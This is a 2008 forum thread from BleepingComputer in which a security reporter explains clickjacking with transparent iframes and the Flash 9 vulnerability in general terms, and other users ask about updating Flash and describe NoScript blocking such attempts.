Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Clickjacking - What is it?


  • Please log in to reply
6 replies to this topic

#1 harrywaldron

harrywaldron

    Security Reporter


  • Members
  • 509 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Roanoke, Virginia
  • Local time:05:39 AM

Posted 20 October 2008 - 10:13 AM

While clickjacking is not a new concept, it's gaining popularity as technique used for malicious websites. As iFrames are logical divisions of a webpage, the approach is to create a "transparent iFrame page" that lines up exactly with the real web page being accessed. The buttons in the "invisible iFrame page" replace the buttons in the real web page. When the user clicks on the button, they may allow malicious software to be loaded or security at the true site they were trying to access to become compromised.

The Adobe Flash facility is one of the most widely installed software products in the world, as it's used by all major browsers. Adobe Flash (v9 and lower) is vulnerable to these attacks and it's a popular method now being used to achieve clickjacking. To stay protected from this threat, users should move to Adobe Flash v10, keeping AV protection updated, keep all O/S and browsers updated, and avoid risky websites.

Clickjacking - What is it?
http://www.avertlabs.com/research/blog/index.php/2008/10/15/clickjacking/
http://en.wikipedia.org/wiki/Clickjacking
http://www.mxlogic.com/itsecurityblog/1/2008/10/What-is-ClickJacking.cfm
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9115818
http://blogs.zdnet.com/security/?p=1972
http://www.securityfocus.com/news/11534?ref=rss
http://www.schneier.com/blog/archives/2008/10/clickjacking.html

QUOTE: Letís use an example. You have a web page A controlled by an attacker. A contains an IFRAME element B. In a clickjack attack, B would be set to transparent and the z-index property of the layer set to higher than other elements of page A via CSS. B will also need to be so big so that the user can click itís content. The attacker can then place any button to do anything he wants in B. Then the attacker can place some buttons on page A. The location of the buttons in B must match the buttons in A. So when the user clicks on a button on page A, they are actually clicking the button in B because the z-index property of Bís buttons are higher than Aís buttons. This attack uses DHTML, does not require Javascript, so disabling Javascript will not help.

This vulnerability affects multiple web browsers. Unfortunately, no patch for it is currently available, so users should be careful. The vulnerability has also been found to affect Adobe Flash Player, the most popular rich media internet application today. Adobe has released a security advisory and provided a workaround.

Clickjacking - Adobe recommended workarounds (move to version 10)
http://msmvps.com/blogs/harrywaldron/archive/2008/10/16/adobe-flash-version-10-security-release-fixes-many-bugs.aspx
http://www.adobe.com/support/security/advisories/apsa08-08.html
http://www.adobe.com/support/security/bulletins/apsb08-18.html

BC AdBot (Login to Remove)

 


#2 MaraM

MaraM

  • Members
  • 1,717 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:British Columbia, Canada
  • Local time:02:39 AM

Posted 26 October 2008 - 03:58 PM

Thanks so much for the information, harrywaldron!

Just wondering if, for those of us that are a tad mind-boggled by much of this type of thing, would it be easier to simply download the latest version of Adobe? And if so, does one need to uninstall the older version prior to installing one one - or does it overwrite itself, please.
Never let your computer realize you are in a hurry or just typing the last few words of a vital document.

While outer events might make one happy or sad, happiness itself is entirely internal, and at all times completely within one's power.

#3 JTyler

JTyler

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:04:39 AM

Posted 06 November 2008 - 12:43 PM

ClickJacking.... so what will people think of next to mess with us regular folks. Speaking from the point of view of someone with kids, it sure does become hard to monitor their internet surfing when I myself don't know what to trust.
And why can't Flash do something about this? Seems it would be important wouldn't it?
Janice

#4 buttoni

buttoni

  • Members
  • 267 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Temple, Texas
  • Local time:04:39 AM

Posted 10 November 2008 - 08:42 PM

I use FX 3.0 with NoScript add-on and NoScript saved my butt this week from a ClickJack attempt. We killed a gigantic 3" spider in our bathroom the other day. It scared the @#$% out of me, as I almost stepped on it barefoot! It had identifying back markings that positively confirmed our suspicion it was a Brown Recluse Spider!!! VERY bad bites that can cost you a foot, leg, or arm. The venom destroys tissue! :thumbsup:

Anyway, to get back to the reason for my post........Went to a website of spider pics to help ID the spider we had killed. The second I clicked on one particular spider pic for the enlargement, NoScipt popped up a warning box about an attempted ClickJacking. NoScript has never, EVER talked to me before. I blocked it and got off the site immediately. Scanned my pc then with MBAM, SAS and AVAST and was found clean. Whew! Funny thing is I had JUST read about ClickJacking not one day earlier on one of my other tech forums.

Edited by buttoni, 10 November 2008 - 09:30 PM.

HP Pavilion desktop p6270z; 8 GB ram; Win7 Home Premium x64 bit; FX 4.0; DSL 2Wire modem/router; MVPS Hosts; Comodo FW 5.3(D+ & Sandbox enabled); MSSE; MBAM on demand.

#5 K12hf986

K12hf986

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Gender:Female
  • Local time:05:39 AM

Posted 14 November 2008 - 04:51 PM

My NoScript saved me from a ClickJacking attempt
"A person who never made a mistake never tried anything new."
Albert Einstein

#6 rangecoach

rangecoach

  • Members
  • 92 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:TX, by way of IL, CA, NC, NJ and PA
  • Local time:04:39 AM

Posted 16 November 2008 - 03:24 PM

Is there a NoScript application for IE?
The early bird may get the worm but the second mouse gets the cheese.

You are never defeated until you admit it. Gen. Patton

#7 PedroDaGr8

PedroDaGr8

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Location:Lexington, KY, USA
  • Local time:05:39 AM

Posted 22 November 2008 - 06:33 PM

I am curious. Maybe it is the fact that when it comes to webpages I am a bit of a neophyte. I can do HTML but that is about it. What is the purpose of having the ability to set an iframe to transparent? Why is this necessary and why can't IT be blocked?




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users